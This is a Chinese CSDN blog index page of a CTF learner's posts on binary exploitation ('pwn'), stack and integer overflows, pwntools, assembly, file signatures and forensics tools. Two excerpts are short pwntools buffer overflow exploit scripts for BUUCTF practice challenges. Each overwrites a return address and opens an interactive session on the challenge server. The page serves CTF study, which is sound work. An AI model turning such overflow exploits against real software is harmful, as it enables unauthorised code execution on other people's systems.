叁年_-CSDN博客

原创整数溢出

整数分为有符号和无符号两种类型，有符号数以最高位作为其符号位，即正整数最高位为1，负数为0，无符号数取值范围为非负数，常见各类型占用字节数如下：当程序中的数据超过其数据类型的范围，则会造成溢出，整数类型的溢出被称为整数溢出。...

2020-05-01 21:21:32 1101

原创 BUUCTF|warmup_csaw_2016 1

from pwn import *context.log_level = 'debug'io=remote('node3.buuoj.cn', "28247")payload = "A"*(0x48) + p64(0x40060D)io.sendline(payload)io.interactive()

2020-04-30 09:59:00 1230 1

原创 BUUCTF|rip

from pwn import *context.log_level = 'debug'io=remote('node3.buuoj.cn', "28808")payload = "A"*(0xf + 8) + p64(0x401198)+ p64(0x401186)io.sendline(payload)io.interactive()

2020-04-30 07:51:53 2128 4

原创栈溢出原理

了解栈溢出，首先要了解什么是栈。栈是一种典型的先进后出( First in Last Out )的数据结构，其操作主要有压栈(push)与出栈(pop)两种操作。

2020-04-28 19:48:15 690

原创 pwntools介绍及使用

什么是pwntools？简单来说就以一整套pwn工具集，涵盖了pwn题利用脚本所需要的各种工具。Pwntools主要作用？包括方便的IO交互函数，ROP、格式化字符串等利用的自动化工具，shellcode生成器等等。为什么选择pwntools？目前最好用也是仅有的大型pwn利用框架。能节省大量编写脚本的时间。Pwntools模块总览pwntools使用参考文献Pwnlib.asm...

2020-04-27 13:08:02 12487

原创攻防世界之pwn新手区

level2guess numint overflowlevel0level3level2## guess num## int overflow## level0level3

2020-04-27 11:38:22 366

转载高地址&低地址、高字节&低字节、大端小端和储存顺序

参考博客https://blog.csdn.net/ce123_zhouwei/article/details/6971544https://my.oschina.net/alphajay/blog/5478一、高地址和低地址二、高字节低字节如int a=16777220，化为十六进制是0x01 00 00 04则04属于低字节，01属于高字节三、大小端模式（1）如果a在内存中的存放...

2020-04-26 12:34:48 5336

安装与使用Crypto 算法库在 python 中最初叫 pycrypto，这个作者有点懒，好几年没有更新，后来就有大佬写了个替代库 pycryptodome。这个库目前只支持 python3，安装也很简单pip install pycryptodome就行了！详细的用法可以看看官方文档常见对称密码在 Crypto.Cipher 库下，主要有：DES 3DES AES RC4 Salsa20...

2020-04-26 09:03:59 2102

原创 CTF常见文件头

标题文件头文件尾总结JPEG (jpg)，　　文件头：FFD8FF　　　　　　　　　　　　　　　　　　　　　　文件尾：FF D9PNG (png)，　　文件头：89504E47　　　　　　　　　　　　　　　　　　　　　文件尾：AE 42 60 82GIF (gif)，　　文件头：47494638　　　　　　　　　　　　　　　　　　　　　　文件尾：00 3B ZIP Archive ...

2020-04-25 20:18:20 569

原创 2020.4月安恒月赛之杂项

blueshark发现是取证题，首先寻找特殊字符串，找到一个what_you_want.7z下面的16进制头是377abc是7z压缩包文件头，将之复制出到winhex。保存7z压缩包，里面有一个加密文件。提示密码是蓝牙密码。在wireshark中查找字符串，PIN，发现密码最后打开文件，得到flagflag{快去试试吧！}...

2020-04-25 18:17:15 623

原创 Pwn学习之汇编基础

汇编是什么：计算机执行的语言都是以1和0的二进制语言，物理上则表现为电信号的高低电平。汇编语言把机器指令翻译成容易理解的语句。例如：1000100111011000 # 机器指令MOV AX,BX # 汇编指令相对于机器指令，汇编指令更容易理解。不管是REVERSE还是PWN都需要了解基本的汇编语法知识。了解寄存器:寄存器是计算机暂存指令、数据和地址的地方常用寄存器：...

2020-04-24 15:12:27 1475 1

原创 Misc题目分类及使用工具篇

流量分析：Wireshark文件分析：binwalk010Editorwinhex隐藏文件提取：foremostbinwalk图片隐写：PsStegsolve音频隐写：Audacity视频隐写：Pr密码破解：CTFcrack其他工具：QR（二维码扫描）...

2020-04-24 10:24:19 1970 1

原创 Ubantu下Pwndbg的安装

前置条件：安装python3.5版本sudo apt-get install python3.5安装pwndbg：git clone https://github.com/pwndbg/pwndbgcd pwndbgsudo ./setup.sh安装成功后：gdb # 输入pwngdb> # 回显...

2020-04-24 10:07:22 4844

原创 Pwn学习流程

Pwn前置技能：汇编语言C语言pythonlinux系统Pwn环境搭建：ubantu（64位）python2pippwntoolspwndbg32位libc库……

2020-04-23 22:11:39 453

cm_zl